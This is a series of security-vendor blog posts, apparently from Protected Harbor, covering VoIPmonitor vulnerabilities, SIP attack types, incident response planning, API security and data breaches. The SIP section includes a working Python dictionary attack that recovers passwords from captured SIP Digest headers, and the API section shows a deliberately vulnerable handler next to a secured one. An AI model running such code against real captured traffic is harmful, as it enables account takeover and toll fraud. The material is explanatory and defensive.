Category: Cybersecurity

VoIP Monitoring Software’s Critical Security Flaws Discovered

There’s no question that VoIP (Voice over Internet Protocol) is revolutionizing how businesses communicate, but, as with any new technology, there are growing pains. One of the significant issues with VoIP is that problems can be hard to detect and diagnose. That’s where VoIP monitoring comes in.

VoIP monitoring is the process of keeping track of voice traffic and identifying issues with call quality. VoIPmonitor is a popular monitoring tool that lets operators analyse, listen to and record VoIP calls; it includes call analysis, quality measurement and media analysis features. Kerbit, a penetration-testing and vulnerability research firm, found new vulnerabilities in VoIPmonitor and published a warning describing the flaws and how attackers could exploit them.

What is VoIPmonitor?

VoIPmonitor is an open-source network packet sniffer for the SIP, RTP and RTCP VoIP protocols. It runs on Linux and lets users monitor and troubleshoot call quality and decode, play and archive calls in a CDR database.

The software measures jitter, latency and packet loss, all of which affect the quality of a VoIP call. Simply put, it monitors the quality of service (QoS) of VoIP conversations, which covers both fault and performance management. Tracking these metrics in both directions, together with the mean opinion score (MOS) and round-trip time (RTT), shows whether the call path is healthy for the whole duration of the connection.

What are the flaws identified by Kerbit?

Kerbit detected three vulnerabilities, which are listed below:

  • CVE-2022-24259 (CVSS score: 9.8) – An authentication bypass in the GUI’s “cdr.php” component lets an unauthenticated attacker elevate privileges via a specially crafted request.
  • CVE-2022-24260 (CVSS score: 9.8) – An SQL injection in the GUI’s “api.php” and “utilities.php” components lets an attacker elevate privileges to administrator and retrieve sensitive data.
  • CVE-2022-24262 (CVSS score: 7.8) – Remote command execution through the GUI’s configuration-restore feature: the archive file type is never checked, so an attacker can execute arbitrary commands by uploading a forged file.

The restore flaw means that whatever the attacker packs into the uploaded “backup” is accepted and processed, so a malicious file can end up being run on the server. On its own this requires access to the restore feature, but chained with the authentication bypass or the SQL injection it gives an unauthenticated attacker administrator access and then command execution on the host.

In short, if these vulnerabilities are successfully exploited, unauthenticated attackers can elevate privileges to administrator level and run arbitrary commands on the VoIPmonitor server. Operators should update to the vendor’s fixed release and keep the GUI off the public internet.

Other Types of VOIP Attacks?

VoIP can be as reliable and secure as a traditional telephone line, and more so than a cellular connection, but only if the network behind it is set up and hardened properly; no deployment is completely hacker-proof.

Most VoIP attacks succeed because administrators fail to implement adequate security measures, and SIP hacking in particular is the usual entry point. SIP servers, after all, are at the heart of both internal IP telephony and commercial services, as seen in the diagram:

It’s vital to keep your SIP servers safe. The following are four types of SIP-based VoIP hacks that have gained popularity in the telecom business in recent years:

  1. SIP Amplification Attack – DDoS
    Because SIP is so widely deployed in VoIP systems, SIP abuse remains one of the most prevalent security concerns in the telecom space. A typical SIP amplification attack looks like this:
    the attacker sends a flood of SIP requests (INVITE, REGISTER or OPTIONS) over UDP with the source IP address spoofed to that of the victim. Each open SIP server answers the victim with responses that are larger than the request, and because SIP over UDP retransmits responses that are not acknowledged, every spoofed packet produces several response packets. Many servers answering at once add up to an application-layer DDoS against the victim.
  2. SIP Trust Relationships Hack
    SIP gateways rely on SIP trunks for call set-up and CDR/billing, which makes trunks attractive targets. SIP trunks frequently have no password at all and rely on IP-address filtering for trunk authentication, and most accept a direct INVITE without a prior REGISTER. An attacker who can spoof or reach a trusted address can place calls through the trunk at the victim’s expense.
  3. SIP Authentication Hack

SIP 2.0 (RFC 3261) uses HTTP-style Digest authentication, with MD5 as the default algorithm, so that the UAC’s password is never sent in clear text.
The problem is that this scheme is only as strong as the password behind it. When a UAC sends a request such as REGISTER, the UAS (or registrar) answers with a 401/407 challenge. The most basic authentication challenge consists of the following:

  • a Realm – identifies the protection domain, so the client knows which credentials to use.
  • a Nonce – a unique string generated by the server for each challenge, usually from a timestamp and a server secret, which gives it a finite lifetime and prevents replay.

The UAC then answers with a response digest: MD5(HA1:nonce:HA2), where HA1 = MD5(username:realm:password) and HA2 = MD5(method:uri) (with qop=auth, the nonce count, client nonce and qop value are mixed in as well).

Hashed credentials are no longer sufficient to defend VoIP systems against authentication attacks. With a network analyzer an attacker can capture a single challenge and the matching Authorization header, and since every input except the password is in those headers, the MD5 digest can be attacked offline with a dictionary or brute force until the password is recovered.
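The offline attack just described, as an added example written for this page (not from Kerbit or VoIPmonitor): the extension, realm, nonce and password are constructed, and the “captured” Authorization header is produced by a small function that plays the victim’s phone, exactly as a sniffer on the path would see it.

```python
import hashlib
import re


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce,
                    qop=None, nc=None, cnonce=None):
    """RFC 3261 Digest response (MD5, the SIP default).

    HA1 = MD5(user:realm:password)          -- the only secret input
    HA2 = MD5(method:request-uri)
    response = MD5(HA1:nonce:HA2)                    (no qop)
             = MD5(HA1:nonce:nc:cnonce:qop:HA2)      (qop=auth)
    """
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    if qop == "auth":
        return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


def parse_digest_params(header: str) -> dict:
    """Split a WWW-Authenticate/Authorization Digest header into its parameters
    (values may be quoted, like realm, or bare, like nc and qop)."""
    body = header.split("Digest", 1)[1]
    pairs = re.findall(r'(\w+)=("[^"]*"|[^,\s]+)', body)
    return {key: value.strip('"') for key, value in pairs}


def phone_authorization_header(password: str, nonce: str) -> str:
    """Simulates the victim's SIP phone answering a 401 challenge for REGISTER
    (constructed values). Everything except the password crosses the wire."""
    p = {"username": "1001", "realm": "asterisk", "nonce": nonce,
         "uri": "sip:pbx.example.net", "qop": "auth", "nc": "00000001",
         "cnonce": "0a4f113b"}
    p["response"] = digest_response(p["username"], p["realm"], password, "REGISTER",
                                    p["uri"], nonce, p["qop"], p["nc"], p["cnonce"])
    return ('Authorization: Digest username="{username}", realm="{realm}", '
            'nonce="{nonce}", uri="{uri}", qop={qop}, nc={nc}, cnonce="{cnonce}", '
            'response="{response}", algorithm=MD5').format(**p)


def dictionary_attack(auth_header: str, method: str, wordlist):
    """Offline attack on one captured Authorization header: recompute the
    digest for each candidate password and compare. Returns the password
    that matches, or None. The server is never contacted."""
    p = parse_digest_params(auth_header)
    for candidate in wordlist:
        guess = digest_response(p["username"], p["realm"], candidate, method,
                                p["uri"], p["nonce"], p.get("qop"), p.get("nc"),
                                p.get("cnonce"))
        if guess == p["response"]:
            return candidate
    return None


if __name__ == "__main__":
    captured = phone_authorization_header("summer2021", "5f1a2b3c")  # constructed capture
    print(dictionary_attack(captured, "REGISTER", ["password", "1234", "summer2021"]))
```

Nothing here talks to a SIP server, which is the point: once one exchange has been captured, the registrar’s lockout and rate limiting never see the guesses. Mitigations are long random SIP secrets, carrying signaling over TLS (SIPS) so the headers cannot be captured, not exposing SIP to the internet, and, where both sides support RFC 8760, SHA-256 digests in place of MD5 (which only slows the attack; it does not change the dictionary problem).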

  4. Creating a Fake Caller ID / Spoofing

In SIP the caller ID is not protected: it is simply the From header of the INVITE request, and plenty of tools let an attacker set it to anything. This is a prevalent method of voice fraud against PBX systems, so that endpoint must also be protected to avoid roaming fraud or call hijacking.

What can we do?

By including VoIP in your portfolio, you may improve your commercial offering by having IP-based voice features that bring value to both data and video. It also allows you to compete with over-the-top (OTT) service providers who cannot guarantee service quality (QoS). After all, quality and security are the fundamental differentials that customers are most likely to notice regarding voice service. Delivering faultless VoIP call quality involves real-time customer experience management, including total visibility of the traffic running through your IP network.

The VoIP monitoring market is heating up as businesses search for the right solution that fits their needs. Companies are always concerned about security when giving their staff or contractors unfettered access to internet and phone services in remote environments because of the inherent risk of not being in a secure network. However, many remote users still want access to secure phone and internet lines to stay connected without worrying about data costs.

Protected Phones by Protected Harbor is a cloud-based unified VoIP solution that provides businesses with the security and flexibility they need to enable remote work and 24×7 live support with a dedicated system. To learn more about our solution and how we can partner with you, please visit our website or contact us today.

What is an Incident Response Plan (IRP) Checklist?


An Incident Response Plan is your best bet for protecting your company from the consequences of a data breach. The time to plan and prepare for security crises is NOW, whatever they may be, long before they occur.

What is an Incident Response Plan?

A cybersecurity incident response plan (IR plan) is a set of guidelines designed to assist businesses in preparing for, detecting, responding to, and recovering from network security problems. Most IR strategies are tech-focused, addressing concerns like malware detection, data theft, and service disruptions. However, any sizeable cyber assault can have a wide-ranging impact on a firm; therefore, the plan should include finance, customer service, HR, employee communications, legal, and other outside entities.

Why is Incident Response Plan Important?

An Incident Response Plan is important because it defines how to reduce the length and severity of security incidents and identify stakeholders, streamline digital forensics, enhance recovery time, and prevent unfavorable publicity and customer attrition.

Small cybersecurity mishaps, such as malware infection, can quickly escalate into more significant issues, resulting in data breaches, data loss, and company interruption.

A good incident response procedure will help your company reduce damages, patch exploitable vulnerabilities, restore affected systems and processes, and close the attack vector.

Incident response is essential for preventing future occurrences and maintaining a company that handles sensitive data like PII, PHI, or biometrics.

IRP Audit

Before writing your Incident Response Plan, conduct a security audit of your company to identify weak areas. Decide who owns incident handling, who is on the response team, and which other parties (legal, PR, outside forensics) will be involved.

Creating an IRP should involve key stakeholders from across the company, including the CEO, board members and PR representatives (internal and outside). The process should be transparent and approved by those stakeholders, and the resulting plan should be easy to understand and implement rather than overly complex, with a tiered approach that matches the response to the severity of the incident.

How to create an Incident Response Plan & Checklist?

Create an Incident Response Plan

  • The first and most important step in incident response planning is preparation. It should include defining the roles of the IR team and creating an underlying security policy. The security policy should identify the locations and relative value of sensitive data, as well as how many IT resources your company needs to respond to an attack. Make sure that your executives are on board with the plan before it goes live.
  • The second step is to define what triggers the plan: which events count as incidents, and what the response to each looks like. There are many types of incidents, and a different response must be developed for each. Your IRP should identify the kinds of security incident likely to occur and the responsible parties for each, and include a comprehensive communication plan covering the methods and frequency of communication with affected parties.
  • The final step is testing. It is critical to exercise the IRP to make sure all of its parts work and that the team can handle an incident effectively; a plan that has never been run is not a plan. The IRP must be supported by upper management, and it must be practical: easy to implement and quick to execute.

Creating an incident response plan checklist helps your staff cope with a significant incident. The checklist is written with what should happen after an incident in mind.

Post-Incident– The ultimate step of an incident response plan is to create a post-incident investigation checklist. This checklist should include various information, such as disk images, logs, and network traffic reports. It should also detail key elements, including entry point, root cause analysis, and organizational resources targeted in the aftermath of an incident. After the investigation is complete, the team should recommend changes to prevent the same occurrence from occurring again.

Recovery– The recovery phase focuses on bringing systems back to normal operation. The response team must also notify affected parties of the nature and extent of the attack within the period required by regulation (under GDPR, the supervisory authority within 72 hours of becoming aware of a personal-data breach, and affected individuals without undue delay when the risk to them is high). Once a system has been returned to production, the team needs to test it, validate that it is operating normally and document the process. Expect this to take anywhere from a day to several weeks, depending on the size of the IT estate and the business operation.

The recovery phase involves bringing affected systems back to production and testing them regularly. A well-developed plan should include these processes. The more specific they are, the better your plan will be. The more thorough and comprehensive your plan is, the more effective it will be.

Conclusion

The purpose of our cyber incident response plan checklist is to assist your IT security team in developing a complete, coordinated, repeatable, and effective incident response strategy.

Please remember that creating a cybersecurity incident response plan is never a one-time task. Unfortunately, enterprises and their IT security teams may find themselves outmaneuvered by hackers who pivot in their attack strategies/TTP and malware choice if they do not engage in frequent incident response training and IR exercises, including real cyber assault scenarios.

This article should provide you with the information and resources you need to design and implement a successful incident response plan. Partner with Protected Harbor to add best-in-class behavioral analysis to all of your essential data repositories and infrastructure to ensure your data is safe.

At Protected Harbor, we work with individual customers on an Incident Response Plan (IRP) and help them perform an audit to determine where they are today within their IRP. We follow the Critical Controls and guide our customers that match their Incident Response Plan with the specific controls. This provides them with the ability to have a real improvement plan in place.

With that being said, don’t miss out on other crucial aspects of data protection that can be included in your checklist—things like protected data center, disaster recovery plan, backups, testing, and so on. Contact us to create an IRP which is best for you.

What is API security, and why does it matter?


The process of preventing or mitigating attacks on APIs is known as API security. APIs serve as the foundation for mobile and web apps, so it is vital to safeguard the sensitive information they carry.

An API is a software interface that determines how different pieces of software interact with one another. It regulates the kind of requests between programs, how they are made, and what data formats are utilized. APIs are being used in the Internet of Things (IoT) and website applications. They frequently collect and process data or allow the user to submit data processed within the API’s context.

Google Maps, for example, is powered by an API. Google Maps can be embedded into a page by a web designer. When users use Google Maps, they are just using a prewritten API given by Google, rather than code that the web designer built piece by piece. API security includes both your APIs and those you use indirectly.

Web API security entails authenticating users and programs to secure sensitive data and prevent malicious conduct. It is critical to the success of web applications and to safe communication within your company. This article walks you through the steps to secure your APIs.

Types of API Security

API security has grown increasingly critical, especially with the rise of IoT. Users, APIs, and the apps and systems they interact with exchange critical and sensitive data. Hackers can use an insecure API to get access to a computer or network that is otherwise secure. Let’s take a look at commonly used API security types.

API Gateway Security


An API gateway is a central component of an API security architecture: it is the single front door through which API traffic passes, so authentication, rate limiting, input validation and logging can be enforced in one place, and traffic that would otherwise expose your APIs can be detected there.

Defining API security is a four-step process. First, determine the security goals. Second, identify testable implementation constraints and verify that the security measures are sufficient to protect your API against the threats you identified. Third, identify new assets and goals as the API evolves. Fourth, write the security strategy that implements the controls protecting your API.

When you develop an API, build the security controls into the code: they prevent unauthorized users from modifying or intercepting messages. Enforce the security policy at the API itself, use application-level security measures and check your code for vulnerabilities. For example, use OAuth 2.0 to protect your API against external attackers. This alone is not enough; you also need to follow the data-privacy regulations that apply to you.

Restful API security

REST APIs run over HTTP and can be protected with Transport Layer Security (TLS). TLS is the internet security standard that ensures data exchanged between two systems (server to server, or client to server) is encrypted and unaltered in transit. This means that an attacker on the network path cannot read or modify your credit card details as they travel to a shopping website. If a website’s URL starts with “https” (HTTP Secure), it is using HTTP over TLS.

REST APIs usually exchange JavaScript Object Notation (JSON), a lightweight format that browsers and servers both handle natively. REST calls are stateless, so each request must carry its own authentication (a token or key); that is what makes credential handling such a central part of REST API security.

Web Application Security

Web application security is the practice of defending websites and online services from various security risks that take advantage of flaws in the application’s code. Content management systems (e.g., WordPress), database administration tools (e.g., phpMyAdmin), and SaaS apps are common targets for online application assaults.

Organizations that fail to safeguard their web applications are vulnerable to attack. This can lead to data theft, strained client relationships, canceled licenses, and legal action, among other things.

Why does API security matter for businesses?

Many organizations use APIs, but do they adhere to API security best practices? If not, APIs may be one of their most overlooked security risks. APIs that do not limit the number or rate of requests open the door to brute-force attacks, and weak authentication can expose users’ sensitive information to attackers. Breaches frequently go unnoticed for months, and they are often discovered by an external party rather than the company itself.

Developing API security is an important step in securing your application. It requires you to adhere to good coding practices and to implement proper security controls. Common weaknesses that leave a system prone to attack include weak user-level authentication, weak encryption, storing critical secrets on disk and failing to apply security updates and patches, so it is vital to protect your business against these problems.

Beyond coding practices, API traffic can also be compromised on the client side: unsecured public Wi-Fi is a perfect environment for interception. Enforce TLS for every API call and, for users on public Wi-Fi, have the client software use a VPN.

Why is API important?

There are several ways to protect your business against API security issues. Check your APIs periodically to make sure they are secured against malicious input, and test them with an API security testing or runtime protection tool (Sqreen is one example). A security expert can recommend best practices for your APIs, and if you do not want to manage this yourself, a managed security tool or service can protect your application.

Beyond keeping customer data safe, well-secured APIs also help companies protect themselves from identity theft. There are many kinds of attacks that target APIs, each with its own risks. Strong authentication, with two-factor authentication for user-facing flows, is one of the most effective controls: it blocks unauthorized transactions and stops bots using stolen passwords. Back it with a security solution that protects your business.

The key to protecting your APIs is a comprehensive security strategy. Your security team should consider your business’s API access. It should be able to handle unauthorized access and protect sensitive data. It’s essential to know how APIs work. You can also implement a firewall by integrating the security solution into the API.

How to implement API security?

To protect your APIs, consider all possible threats and defend against the attacks that could be launched against them; that is how you keep attackers from using sensitive data. Every API you offer should be served over TLS and require authentication, so that an external attacker can neither read the traffic nor call it anonymously.

Verification
To secure your API from misuse, you need to validate the identity of callers. A unique API key per client is the simplest form; server-side sessions or signed tokens are another. Use a proper authentication protocol rather than trusting the network, because DNS, routing and source IP addresses can all be spoofed. The best way to ensure this is to integrate authentication into your API security framework. Without it, there is no way to guarantee your API is secure.

Authentication
Authentication is essential to the security of your API. It ensures that your APIs are only accessible to callers with the proper credentials, and by ensuring that only trusted users can reach your data you increase trust in your APIs. Authentication keeps unauthorized users from damaging your data, and any operation that changes data must first verify that the caller really is who they claim to be.

Limit Access
A good API security policy is not just a matter of setting limits; it also ensures that the APIs are secure. Unauthenticated callers must not be able to reach sensitive data, and rate limits protect your APIs from brute-force attacks. Do not let callers read stored data they do not own: object-level authorization checks, on every request, that the authenticated user is allowed to access the specific object they asked for.

Conclusion

APIs are expected to become the leading attack vector shortly because they are an attractive target to attackers.

Taking proactive actions to safeguard your API design is the only method to protect your API from attackers.

Following an API Security checklist, such as the one outlined in this post, is the best method. You can also partner with one of the leading security services providers, and they can take care of this for you.

Protected Harbor secures your business using OWASP and similar resources, making sure you’re safe from the most common vulnerabilities at all times. Protected Harbor partners with the clients understanding their requirements and then successfully implementing the ways you might need to safeguard your API against common threats. There’s still a lot to learn about API security, but this is a fantastic place to start. Secure yourself today.

API Security Checklist

A checklist to help you plan and carry out your testing strategy:

  • Create a separate test environment for your API whenever possible so you can test without breaking production.
  • Create functional tests for the happy path first, then automate them with your preferred toolchain.
  • Using the same tools, create negative tests for edge scenarios that lead to security concerns. Begin with testing authentication as a first quick victory.
  • Create detailed documentation for all access control techniques, such as roles, in your APIs. Create test users with a variety of permissions and access to secret resources. Then create test scenarios in which these users try to access unlawful resources. Keep in mind that authorization is just as necessary as authentication!
  • Don’t think of your API as if it were a black box. Discover the kind of issues that your back-end architecture is susceptible to (such as mass assignments, SQL injections, etc.).
  • Create test cases with input exceeding boundaries. Additional attributes, going outside established constraints, and command or SQL injections are all examples (if necessary).
  • Keep an eye on all error responses for signs of internal information leakage.
  • Include security tests in the performance testing process to guarantee that any unusual behavior under stress does not compromise security.
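Putting the “Limit Access” advice and the checklist’s authorization tests into code. The following is an added example written for this page, not Protected Harbor’s code or any product’s API; the key names, users, invoice table and in-memory rate limiter are all constructed for the demonstration. It contrasts a handler that only authenticates (the broken object level authorization pattern, API1 in the OWASP API Security Top 10) with one that also authorizes on the object and rate-limits callers, and it runs the checklist-style matrix of test users against resources they should not be able to reach.

```python
import hashlib
import hmac


def hash_key(key: str) -> str:
    """API keys are stored hashed, so a leaked user table does not leak keys."""
    return hashlib.sha256(key.encode()).hexdigest()


# Constructed in-memory stores; a real service would back these with a database.
USERS = {  # sha256(api key) -> (user_id, role)
    hash_key("alice-key-7c1e"): ("alice", "user"),
    hash_key("bob-key-9f02"): ("bob", "user"),
    hash_key("ops-key-0a11"): ("ops", "admin"),
}
INVOICES = {  # invoice id -> (owner, amount)
    101: ("alice", 42.0),
    102: ("bob", 17.5),
}


class RateLimiter:
    """Fixed-window counter: at most `limit` requests per `window` seconds per key."""

    def __init__(self, limit: int, window: float):
        self.limit, self.window = limit, window
        self._hits = {}

    def allow(self, key: str, now: float) -> bool:
        start, count = self._hits.get(key, (now, 0))
        if now - start >= self.window:
            start, count = now, 0
        count += 1
        self._hits[key] = (start, count)
        return count <= self.limit


LIMITER = RateLimiter(limit=3, window=60.0)


def authenticate(api_key):
    """Map a presented key to (user_id, role), or None. compare_digest keeps the
    comparison constant-time so an attacker cannot learn a key byte by byte."""
    if not api_key:
        return None
    presented = hash_key(api_key)
    for stored, principal in USERS.items():
        if hmac.compare_digest(stored, presented):
            return principal
    return None


def get_invoice_vulnerable(headers, invoice_id, client_ip=None, now=0.0):
    """Authenticates the caller but never asks who owns the object (BOLA)."""
    if authenticate(headers.get("X-API-Key")) is None:
        return 401, "unauthorized"
    invoice = INVOICES.get(invoice_id)
    return (200, invoice) if invoice else (404, "not found")


def get_invoice_secure(headers, invoice_id, client_ip, now):
    """Rate limit -> authenticate -> authorize on the object -> return."""
    if not LIMITER.allow(client_ip, now):  # blunts key guessing from one address
        return 429, "too many requests"
    principal = authenticate(headers.get("X-API-Key"))
    if principal is None:
        return 401, "unauthorized"
    user_id, role = principal
    invoice = INVOICES.get(invoice_id)
    if invoice is None or (invoice[0] != user_id and role != "admin"):
        # Same answer for "missing" and "not yours": no existence oracle.
        return 404, "not found"
    return 200, invoice


def authorization_matrix(handler):
    """Checklist-style negative tests: every test user (plus an anonymous caller)
    against every object. Returns {(user, invoice_id): status}. Each user calls
    from its own address at a fixed time so the limiter does not interfere."""
    keys = {"alice": "alice-key-7c1e", "bob": "bob-key-9f02",
            "ops": "ops-key-0a11", "anon": None}
    results = {}
    for i, (who, key) in enumerate(keys.items()):
        headers = {"X-API-Key": key} if key else {}
        for invoice_id in (101, 102, 999):
            status, _ = handler(headers, invoice_id, f"192.0.2.{i + 1}", 5000.0)
            results[(who, invoice_id)] = status
    return results
```

Run `authorization_matrix` against both handlers: with the vulnerable one, bob’s key returns alice’s invoice with 200; with the secure one he gets the same 404 he would get for an invoice that does not exist, the admin role still sees everything, anonymous callers get 401 everywhere, and a fourth request within the window from one address is throttled with 429. Those are exactly the negative test cases the checklist asks for.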

What causes healthcare data breaches the most frequently?


Patients’ medical records are a goldmine for malicious hackers, if they can get their hands on them. According to Cisco’s Internet Security Threat Report, healthcare is currently the industry most targeted by cybercriminals.

Health data breaches have been in the headlines for a while now. From the crippling breach of Anthem to the compromise of 4.5 million patient records at UCLA Health, nothing is sacred when it comes to cyberattacks these days. While the impact of a security incident differs with its magnitude, poorly protected IT systems and hacking/IT incidents are consistently the biggest culprits behind privacy and financial setbacks.

Healthcare data breaches are on the rise. Although many are concerned with hacking, several factors could potentially cause a significant healthcare data breach.

Common causes of healthcare data breaches!

Data breaches are becoming more and more common. With the rise of hacking, phishing, malware attacks, and new security regulations, all healthcare organizations need to stay proactive in protecting their data.

The most common cause of data breaches for healthcare organizations is malicious or cyber-criminal attacks. Breaches can come from various sources, including hackers stealing protected health information (PHI) from an organization’s database, lost or stolen unencrypted devices, and weak or stolen passwords. Another major cause is misconfigured medical devices and office equipment; medical device security remains a major concern for organizations.

Hacking/ IT Incidents accounts for 47% of healthcare data breaches making it the #1 cause of healthcare data breaches.
(Source: Electronic Health Reporter)

Patient Data Theft: High risk
Health care organizations are all too familiar with data theft and with new methods of exfiltrating information, such as electronic medical records (EMRs) and protected health information (PHI), from connected medical devices. IP-enabled medical devices are easily exploited by experienced attackers because of minimal access controls and known vulnerabilities. An attacker may take data directly from the device, but since medical devices typically hold limited data, they are more likely to pivot to servers, data centers or other hosts on the network, such as the Windows XP workstation that is connected to the electronic medical record. Data breaches in healthcare are classified as theft or loss 32% of the time, compared with only 15% in other industries, second only to hacking and IT incidents, according to Healthcare Dive. With the number of high-profile breaches in healthcare over the past three years, healthcare organizations need tighter controls to mitigate this risk.

What is the cost to your company?

According to IBM’s Cost of Data Breach Report 2021:

  • Healthcare organizations spent an average of $161 per breached record in 2021, a figure expected to keep rising.
  • In healthcare it takes an average of 329 days to identify and contain a breach.

The report shows that the cost of data breaches has risen once again, to a record high since IBM first published the report 17 years ago. The average cost of a data breach increased by 10% year over year to $4.24 million per incident, and the average cost of a healthcare data breach increased by about $2 million to $9.23 million per incident in 2021. The average cost of a ransomware attack was $4.62 million per incident.

How can you avoid a data breach?

  • Back up data– A proper backup schedule and a secure process for accessing the off-site copy is the baseline. Confirm that your backup/recovery partner is also HIPAA compliant, and consider cloud hosting where it improves security.
  • Two-factor authentication- Multi-factor authentication (2FA when exactly two factors are used) is a simple concept that companies can implement easily. The benefit is in the name: access requires two independent factors, just as a door with two locks needs two keys, so a stolen password alone is no longer enough to get in.
  • Safeguard data and devices- Put security tools and policies in place for every device that accesses your network, monitor remotely for unauthorized access and unusual activity, and set and limit data access rights per device.
  • Train and educate staff– Create a policy for regular security training and practice sessions. Identifying phishing emails, using strong passwords and following anti-malware procedures should all be part of this training.

To wrap things up!

Security and compliance are among the top factors healthcare organizations consider when adopting new technologies. Many organizations did not, or could not, take the time to strategically align new cloud-based tools and platforms with their existing security standards as they moved to remote work during the pandemic.
Security and privacy should be a priority when working with technology partners in healthcare. A trusted partner is responsible for its users’ privacy and security: it builds safeguards into its processes, designs and code, and constructs its infrastructure to protect user information carefully. Cisco, Greenway, GE Healthcare and Protected Harbor are some of the most trusted and reliable healthcare IT solution providers, with long experience delivering solutions to healthcare and other organizations.

What is a data breach? How to prevent one?


Data breaches become more common every year. According to the Identity Theft Resource Center (ITRC) 2021 data breach report, there were over 1,291 data breaches that exposed more than 7 billion records last year. A data breach can harm your company’s reputation, bring production to a halt and even cause enough financial harm to send the company under. In this article we review what a data breach is and how to stop one.

What is a data breach?

A data breach is a cyber-attack where unauthorized individuals gain access to sensitive personal or confidential information. When a security breach occurs, the hacker can steal and misuse personally identifiable information (PII) such as social security numbers, credit card details, bank account numbers, and even your protected health information (PHI) that could be used for fraudulent activity. A data breach on an organization leads to the release of client information or internal content, moreover, it can be intentional (theft, sabotage) or unintentional (internal error).

Among the breaches reported this year, the manufacturing and utilities sector was hit hardest by victim count, with 48 compromises affecting 48,294,629 people. Healthcare was second, with 78 compromises and more than 7 million victims. Financial services, government, and professional services each had more than 1.5 million victims.

Security magazine’s top data breaches list for 2021:

  • Brazilian Database — 223 million, January
  • Bykea — 400 million, January
  • Facebook — 533 million, April
  • LinkedIn — 700 million, June
  • Cognyte — 5 billion, June
  • Other notable breaches: Ubiquiti, Clubhouse, USCellular, Twitch, T-Mobile, Panasonic, GoDaddy

How do breaches happen?

Data breaches happen in many ways. Pakistani delivery and ride-hailing company Bykea left a server exposed on the internet without authentication. A flaw in Facebook’s contact-import feature let attackers scrape user records in bulk. Cognyte let an unsecured database get indexed by search engines, Twitch was hit through a server misconfiguration, and T-Mobile’s attacker got in through weakly protected network access points.

Missing security patches – Security tools, and the software they protect, go out of date quickly, and updates are needed to stop new threats. It is not just antivirus software that needs patching: many network-level compromises start with unpatched Cisco, Microsoft, or Apache software.

Unencrypted data – Plaintext data can be read by anyone who gets hold of it, for example sensitive files sitting on a cloud server with no additional protection. Encryption does not stop malware, ransomware, or password guessing, but it limits the damage: data that is encrypted at rest and in transit is useless to an attacker who copies the storage or intercepts the traffic without also obtaining the key.

Phishing – The most common initial-access technique. A phishing message tricks an employee into clicking a link or opening an attachment. Attackers use it to take over a target’s email, social media, or other accounts, or to reach connected systems such as point-of-sale terminals and order-processing systems.

Spyware – Malware that silently records activity until the attacker has what they need. Employees do not even have to download an infected file: a drive-by download from a compromised or malicious web page is enough.

Worms – Self-replicating malware that spreads from machine to machine over the network without any user action. Once on a system, a worm can steal data directly, modify system files, or open a backdoor that the attacker uses later.

Virus – Malicious code that relies on a user running the infected file. Most infections come from downloads from untrustworthy websites or from email attachments, which is another argument for employee security training.

Trojan horses – Attacks of this type pretend to be another program. If you attempt to pirate software or download it from an untrustworthy source, it will often come packaged with a trojan horse. After you’ve installed your program, it often works as it should, but at the same time, a trojan horse is collecting your data or controlling your PC in the background.

Ransomware – The most visible and damaging form of malware. It arrives through the same channels as viruses, worms, and trojan horses, then encrypts the victim’s files and systems. To regain access, the attackers demand a ransom, usually in bitcoin; victims have in some cases paid millions of dollars to get their networks back.

How to prevent a data breach?

A data breach is a threat to every organization, from the smallest e-commerce shop to the largest bank. Although breaches are on the rise, most of them are avoidable if you know how.

The first step is to stop thinking of your data as “yours” and start thinking of it as something others want. Securing your data is no longer only about what you do to protect it; it is also about what others can do to steal it. Securing your own network is not enough: you must also secure the systems of the vendors and partners that connect to it, and limit what they can reach. The best practices below help prevent data breaches:

  1. Educate and train your employees – Employees are often the weakest link in the data security chain; people open suspicious emails every day. A proper training and awareness program reduces the risk. Teach staff how to create strong, unique passwords, when a password must be changed (after any suspected compromise), and how to recognize, avoid, and report phishing.
  2. Create procedures and update software regularly – Write data security procedures and review them consistently. Install patches for applications and operating systems as soon as they are available. Regular security audits verify data integrity and double as a data protection checklist, and regular vulnerability assessments must cover everything from data storage to remote access for employees, the Bring Your Own Device (BYOD) strategy, and the policies and procedures around them.
  3. Data backup, recovery, and remote monitoring – Backups are essential because attacks, ransomware in particular, can destroy or encrypt your data. Your IT team should have 24×7 monitoring of the network and an automated, tested backup system, ideally with copies kept offline or otherwise out of reach of a compromised network. Work with an MSP if you do not have a dedicated IT team.
  4. Encrypt data – Encrypt data before it is sent by email or other services, and encrypt it at rest. Give staff a dedicated Wi-Fi network the public cannot reach, and keep the most sensitive systems off Wi-Fi altogether where possible, since a poorly secured wireless network lets a nearby attacker intercept traffic.
  5. Comply with data protection regulations – Organizations must follow the regulations that govern the data they handle. Companies that store, process, or transmit cardholder data must comply with PCI DSS. HIPAA governs who may view and use protected health information, such as a patient’s name together with a Social Security number or diagnosis.
  6. Develop a data breach response plan – Many companies still have no response plan, yet such a plan is central to handling an incident, limiting damage, and rebuilding trust with employees and the public. Clearly define the roles and responsibilities of the people who handle breaches and outline the investigation process. Multi-factor authentication and encryption further reduce the impact of a breach.

To wrap things up

A data breach can happen to anyone, and when it does, it affects not just your business but your customers, employees, and brand. Mitigating the risk means investing in robust security and following the best practices above with a strategy that fits your organization’s needs; breach response plans and security infrastructure vary from one organization to another.

But you don’t have to go it alone. Partnering with a data security and managed IT services provider who understands your business and application needs can set you up for success. Cisco, Symantec, TransUnion, Protenus, and Protected Harbor are among the top data breach solution providers. With breaches growing every year, it is imperative to have an effective solution in place, so don’t waste any more time; get protected today.

China eyeing U.S. healthcare data


Do you want your PHI (protected health information) or DNA going to an authoritarian regime with a history of using DNA for repression and surveillance? The People’s Republic of China (PRC) has collected large sets of data from the U.S. over the years through every means available. Chinese access to American healthcare data now poses a serious risk to the privacy, economy, and national security of the United States.

The COVID-19 outbreak is only one part of the crisis the country’s healthcare system has faced. The sudden strain on healthcare infrastructure left companies and the government reeling. As COVID-19 case rates and testing requirements spiked, China’s BGI Group, one of the world’s largest genomic sequencing companies, offered to help build and run advanced COVID testing labs throughout the U.S. BGI would provide technical expertise and high-throughput sequencers, and even make financial donations for further research.

